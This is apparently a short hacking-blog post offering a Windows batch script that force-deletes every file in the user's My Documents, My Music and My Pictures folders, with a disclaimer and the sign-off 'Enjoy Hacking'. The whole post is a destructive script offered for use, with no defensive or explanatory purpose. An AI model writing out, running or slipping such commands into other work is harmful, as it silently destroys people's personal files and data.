Code to Delete my documents, pictures and music



rem ---------------------------------
rem Delete My Documents
del /f /q '%userprofile%\My Documents\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete My Music
del /f /q '%userprofile%\My Music\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete My Pictures
del /f /q '%userprofile%\My Pictures\*.*'




[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]


Enjoy Hacking...!!!!!!


Comments

Popular posts from this blog

How to create your own 'stare and blink illusion picture'

Reduce Chrome Memory usage using TooManyTabs extension